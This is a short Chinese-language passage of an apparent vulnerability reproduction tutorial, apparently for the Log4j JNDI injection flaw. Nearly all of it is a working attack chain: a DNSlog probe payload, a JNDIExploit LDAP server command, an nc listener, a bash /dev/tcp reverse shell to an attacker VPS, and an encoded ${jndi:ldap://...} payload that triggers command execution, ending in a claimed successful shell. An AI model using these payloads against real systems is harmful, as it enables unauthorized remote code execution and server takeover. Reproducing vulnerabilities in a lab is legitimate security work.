二、漏洞復現
2.1 使用DNLOG平台查看回顯
可以使用相關的dnslog平台查看,也可以使用burp自帶的dnslog進行查看,我這里使用的是 http://dnslog.cn/
${jndi:ldap://rbmanr.dnslog.cn/exp} 有回顯,說明存在該漏洞
2.2 反彈shell
1、首先起一個ldap服務,IP為接收shell的地址。
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 139.198.xx.xx
2、在VPS上開啟NC監聽
nc -lvvp 1000
3、使用bash命令反彈shell
bash -i >& /dev/tcp/139.198.xx.xx/1000 0>&1 //,這里需要先base64編碼,然后再進行兩次url編碼。
${jndi:ldap://VPSIP:1389/TomcatBypass/Command/Base64/YmFzaCAtaSsfqwA%252BJiAvzkuMTk4LjEyNS45OSgas85OTk5IDA%252BJjE%253D}
成功反彈shell到我們的VPS上